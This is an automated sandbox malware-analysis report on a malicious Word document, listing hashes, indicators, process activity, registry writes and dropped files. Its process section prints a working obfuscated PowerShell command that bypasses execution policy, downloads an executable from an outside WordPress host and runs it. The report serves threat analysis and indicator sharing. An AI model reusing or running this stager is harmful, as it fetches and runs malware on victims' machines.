analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Guide_08.11.2018_670673454.doc

Full analysis: https://app.any.run/tasks/ed2f4876-39dd-4656-8f4d-99d25bf34333
Verdict: Malicious activity
Analysis date: February 10, 2019, 19:34:26
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
generated-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 5.1, Name of Creating Application: Microsoft Office Word, Author: Henri Mottiez, Number of Characters: 371168, Create Time/Date: Mon Nov 5 09:46:10 2018, Last Saved Time/Date: Mon Nov 5 09:46:10 2018, Security: 0, Keywords: fugit, a, maiores, Last Saved By: Henri Mottiez, Revision Number: 918993, Subject: Guide N670673454, Template: Normal, Title: Guide N670673454, Total Editing Time: 01:00, Number of Words: 26512, Number of Pages: 54, Comments: Sequi praesentium repellendus laudantium libero quo necessitatibus laborum minima.
MD5:

71EEED2411A661B01DE54D5040EE4480

SHA1:

04B30B110331DA01E65AC6D5EB207E9CAA9E5712

SHA256:

E139CD2EB02F7A93C57BC6DADDD187255617FE923379F364D33D25892B874943

SSDEEP:

3072:2SacDC2kS5qXmSQZV7YJ9qmSzGt2uArD0LUhzikvQl4OSVfgvG3505dfgEEN:dacDqSDpZdYJxSit214M84/gvGgqN

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2836)
    • Executable content was dropped or overwritten

      • WINWORD.EXE (PID: 2836)
    • Application was dropped or rewritten from another process

      • usiju.exe (PID: 3804)
  • SUSPICIOUS

    No suspicious indicators.
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2836)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2836)
    • Dropped object may contain Bitcoin addresses

      • WINWORD.EXE (PID: 2836)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (33.9)

EXIF

FlashPix

Category: temporibus
Manager: Denise Chaudet
Company: Carron
Slides: -2147483648
Notes: -2147483648
Lines: 559
HiddenSlides: -2147483648
Bytes: -2147483648
Paragraphs: 250
Comments: Sequi praesentium repellendus laudantium libero quo necessitatibus laborum minima.
Pages: 54
Words: 26512
TotalEditTime: 1.0 minutes
Title: Guide N670673454
Template: Normal
Subject: Guide N670673454
RevisionNumber: 918993
LastModifiedBy: Henri Mottiez
Keywords: fugit, a, maiores
Security: None
ModifyDate: 2018:11:05 09:46:10
CreateDate: 2018:11:05 09:46:10
Characters: 371168
Author: Henri Mottiez
Software: Microsoft Office Word
CompObjUserType: Microsoft Office Word 97-2003 Document
CompObjUserTypeLen: 39
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
32
Monitored processes
2
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
drop and start start winword.exe usiju.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2836"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Guide_08.11.2018_670673454.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3804C:\Users\admin\AppData\Local\Temp\isqiol\usiju.exe $svddmoi='th=';$ieoooi14='qi';$avnrsro='cess; $pa';$ytxspwyu='rt-Proce';$syyoeo4='-force;';$mqreci='nfo/wp';$cgju65='e Pro';$ymkcydmi='ect S';$sgfaqz='gb.exe';$aofgogme51='press';$heyo='ove';$eieyzdi='Po';$hynf='t/t';$eyo='hemes/D';$lnaayyp='($env:tem';$eufz='DownloadF';$blyozr='ystem';$okjnxfb='l.e';$hqpeorl3='ile(''htt';$zqyb='ol'') ';$mghjhj='lic';$esv='t.W';$iclqh='New-Obj';$mkmi='y Bypa';$rcm=';Rem';$vjkcteo41=' -Scop';$axxeey=' + ''\is';$wxdba='2.hariom';$uuex='eb';$xaoue='emp';$yoo='ss $path';$adslsuy='.Ne';$ava='h); Sta';$gviei63='xe'',$pat';$ezwfne='-conten';$auya='-Item (f7f81a39-5f63-5b42-9efd-1f13b5431005#39;;$vwryiqjs='urse ';$jmxlgsy='Se';$youxai='ss';$awqziyi='p+''\tnail';$uyzt='web.i';$oigf='ps://word';$kycpat8='client).';$cmeerres='t-Executi';$owg=''');(';$nivui='-rec';$wlzo='ivi/po';$gcauay='on';$lhixui='env:t'; Invoke-Expression ($jmxlgsy+$cmeerres+$gcauay+$eieyzdi+$mghjhj+$mkmi+$youxai+$vjkcteo41+$cgju65+$avnrsro+$svddmoi+$lnaayyp+$awqziyi+$sgfaqz+$owg+$iclqh+$ymkcydmi+$blyozr+$adslsuy+$esv+$uuex+$kycpat8+$eufz+$hqpeorl3+$oigf+$aofgogme51+$wxdba+$uyzt+$mqreci+$ezwfne+$hynf+$eyo+$wlzo+$okjnxfb+$gviei63+$ava+$ytxspwyu+$yoo+$rcm+$heyo+$auya+$lhixui+$xaoue+$axxeey+$ieoooi14+$zqyb+$nivui+$vwryiqjs+$syyoeo4);C:\Users\admin\AppData\Local\Temp\isqiol\usiju.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 309
Read events
914
Write events
390
Delete events
5

Modification events

(PID) Process:(2836) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:32$
Value:
33322400140B0000010000000000000000000000
(PID) Process:(2836) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(2836) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
On
(PID) Process:(2836) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:WORDFiles
Value:
1313472542
(PID) Process:(2836) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1313472656
(PID) Process:(2836) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1313472657
(PID) Process:(2836) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
Operation:writeName:MTTT
Value:
140B00008C2C18B177C1D40100000000
(PID) Process:(2836) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:x3$
Value:
78332400140B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(2836) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:delete valueName:x3$
Value:
78332400140B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(2836) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
Executable files
13
Suspicious files
0
Text files
121
Unknown types
2

Dropped files

PID
Process
Filename
Type
2836WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR9A33.tmp.cvr
MD5:
SHA256:
2836WINWORD.EXEC:\Users\admin\AppData\Local\Temp\isqiol\Diagnostics.Format.ps1xmltext
MD5:FF6EEB8125B9265C5BA40AF9F7C6F6BC
SHA256:7D569C1155CFA9B7BB2BA225EE409A55C8B0E8217F3A7E05BAA39DA1BD7C4689
2836WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:4D69D9BCBFC324E700A5A4D9E4D60348
SHA256:B0222DC047C29341F9E3DBAF99CE9E18787FBE50A3485DADF3E273D21B6B2E9C
2836WINWORD.EXEC:\Users\admin\AppData\Local\Temp\isqiol\CompiledComposition.Microsoft.PowerShell.GPowerShell.dllexecutable
MD5:A84B6952AB6A297CCE6C085FA8AB06CB
SHA256:54E3F8199D5C749920A2826C63D7C5E7E86D94874ADDCFD5C9B430671031017D
2836WINWORD.EXEC:\Users\admin\AppData\Local\Temp\isqiol\Certificate.format.ps1xmlxml
MD5:C93A361112351B30E2C959E72789952D
SHA256:4379BD59C1328A6811584D424DF3DC193A5D607E2859D3AC1655B9124A5F100D
2836WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$ide_08.11.2018_670673454.docpgc
MD5:0F8FB894B79717270602E208B6D7DC40
SHA256:51D23F02BD09BE022C9806E107A842758184827CB06B899BB846E9C9BC6304E5
2836WINWORD.EXEC:\Users\admin\AppData\Local\Temp\isqiol\DotNetTypes.format.ps1xmlxml
MD5:1AB2FD4B6749AD6831C86411FDCAFB48
SHA256:98540086CFC986D7604FFDED977EF20944D1715BF8453809CE736C919CB6E1EF
2836WINWORD.EXEC:\Users\admin\AppData\Local\Temp\isqiol\en-US\about_Automatic_Variables.help.txttext
MD5:96A664E1A1EE05B3A0C24D3187F9A1A9
SHA256:F6F0CE7433667264EB7483B8C5EF62BEC39CC4F3E7D24378471AF28CD458FED7
2836WINWORD.EXEC:\Users\admin\AppData\Local\Temp\isqiol\en-US\about_Comparison_Operators.help.txttext
MD5:409ED6BE5314BAC97AFC88ACA11725A8
SHA256:613EBA45D12113B49D942FF9CFC939F0F5C8CABB819B5B3BD47B7A4F9E719D48
2836WINWORD.EXEC:\Users\admin\AppData\Local\Temp\isqiol\en-US\about_Command_Syntax.help.txttext
MD5:847B0C3A6010660492ECC1D88A69210D
SHA256:7D7EE4469AE76392317DC7E16E716B5767BD7EEFCDC39F60C51ED1DA2E99AE2B
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
1
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

No data

DNS requests

Domain
IP
Reputation
wordpress2.hariomweb.info
unknown

Threats

No threats detected
No debug info